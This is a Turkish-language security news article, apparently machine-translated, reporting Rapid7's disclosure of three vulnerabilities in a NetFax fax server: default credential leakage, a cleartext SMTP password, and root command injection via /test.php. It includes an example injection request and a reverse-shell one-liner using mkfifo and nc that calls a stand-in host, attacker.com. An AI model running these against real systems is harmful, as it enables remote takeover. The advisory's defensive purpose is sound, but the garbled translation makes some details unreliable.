Yakın tarihli bir güvenlik danışmanında, Rapid7, LTD’nin NetFax sunucusunda Misi Network Co.’da üç ciddi güvenlik açıkını açıkladı ve 3.0.1.0’dan önce tüm sürümleri etkiledi.
Bu kusurlar-CVE-2025-48045, CVE-2025-48046 ve CVE-2025-48047-saldırganların, varsayılan kimlik bilgileri ve açık metin içine maruz kalan hassas bilgilerle, kimlik doğrulamalı saldırılar zinciri aracılığıyla kök seviyesi erişim kazanmasına izin verir.
Risklere rağmen, satıcı bu güvenlik açıklarını ele almayacağını ve kuruluşların önemli tehditlere maruz kalan bu ürüne bağımlı bırakacağını belirtti.
.png
)
İlk güvenlik açığı olan CVE-2025-48045, HTTP ile varsayılan idari kimlik bilgilerinin açıklanmasını içerir. /client.php uç nokta.
Kullanıcılar Web uygulamasına bağlandığında, sunucu, ‘Onein’ istemcisi için eski desteğin bir sonucu olan Clexte metninde varsayılan sistem yöneticisi kimlik bilgileriyle yanıt verir.
Bu sorun CWE-201 olarak sınıflandırılır: Hassas bilgilerin gönderilen verilere eklenmesi ve 6.6 (orta) CVSS 4.0 puanı taşır.
İkinci kusur, CVE-2025-48046, depolanan SMTP şifrelerinin maruz kalmasıyla ilgilidir.
Web arayüzü, /config.phpreturn adresine bir GET isteği ile erişilebilen parolaları, gerçek yapılandırma dosyasını düzeltirken, SMTP parolasını clear metninde.
Bu, CVSS ölçeğinde 5.3 (orta) olarak derecelendirilen yapılandırma dosyasındaki klasik bir CWE-260: Parola.
Komut enjeksiyonu uzaktan kod yürütmeyi etkinleştirir
En kritik güvenlik açığı olan CVE-2025-48047, kimlik doğrulamalı kullanıcıların sunucunun test işlevlerinde, özellikle de erişilebilenler, sunucunun test işlevlerinde uygunsuz girdi sterilizasyonunu kullanmasına izin verir. /test.php.
Gibi parametreler ETHNAMESERVER Ters kabuk yükleri de dahil olmak üzere sistem komutlarını enjekte etmek için manipüle edilebilir. mkfifo Ve nc İkili.
Bu güvenlik açığı, bir OS komutunda (“OS komut enjeksiyonu”) kullanılan özel elemanların uygunsuz nötralizasyonu altında CWE-78: uygunsuz nötralizasyon altında kategorize edilir ve kritik olarak derecelendirilmiştir (CVSS 9.4).
Saldırı zincirinin basitleştirilmiş bir örneği aşağıdaki gibidir:
textGET /test.php?ETHNAMESERVER=`whoami` HTTP/1.1
Host: vulnerable-server
Bu tasarlanmamış giriş sunucu tarafından yürütülür ve kök kullanıcı olarak uzaktan kod yürütülmesine (RCE) yol açar.
Saldırganlar bunu ters kabuk yükü ile yükseltebilir:
bashmkfifo /tmp/s; nc attacker.com 4444 0/tmp/s 2>&1; rm /tmp/s
Satıcı yanıtı ve risk azaltma
Rapid7 ve TWCERT’in MII ile etkileşime geçmesi için tekrarlanan girişimlere rağmen, satıcı bu güvenlik açıklarını ele almayı reddetti ve yalnızca kullanıcıların NetFax sunucusunu harici ağlara maruz bırakmaması gerektiğini söyledi.
Bununla birlikte, özellikle varsayılan kimlik bilgileri ilk girişte değiştirilecek şekilde uygulanmadığından ve hassas veriler yeterince korunmadığından, iç sömürü için risk kalır.
Küçük NetFax Sunucu Güvenlik Açığı
| CVE kimliği | Güvenlik Açığı Açıklaması | CWE | CVSS 4.0 | Saldırı vektörü | Şiddet |
|---|---|---|---|---|---|
| CVE-2025-48045 | Varsayılan Kimlik Bilgileri Açıklama | CWE-201 | 6.6 | Get /client.php | Ilıman |
| CVE-2025-48046 | Temiz metnde depolanan şifreler | CWE-260 | 5.3 | Get /config.php | Ilıman |
| CVE-2025-48047 | Komut Enjeksiyonu (RCE) | CWE-78 | 9.4 | Get /test.php (ping işlevselliği) | Eleştirel |
Rapid7 tarafından önerilen iyileştirme adımları şunları içerir:
- Sunucuyu internete veya gereksiz dahili ağlara maruz bırakmayın.
- Kurulumdan hemen sonra varsayılan kimlik bilgilerini değiştirin.
- İstemcilere göndermeden önce yapılandırma dosyalarından duyarlı bilgileri düzeltin.
- Tüm yapılandırma parametreleri için katı giriş sanitizasyonu ve sunucu tarafı doğrulama uygulayın.
Hiçbir satıcı yaması gelmeden, kuruluşların maruziyetlerini gözden geçirmeleri ve bazı müşterilerin zaten yaptığı gibi, etkilenen cihazların hizmetten çıkarılmasını düşünmeleri istenir.
Rapid7’nin InsightVM ve Nexpose’u kullanan güvenlik ekipleri, en son içerik sürümünde sağlanan kimlik doğrulanmamış çeklerle maruz kalmalarını değerlendirebilir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!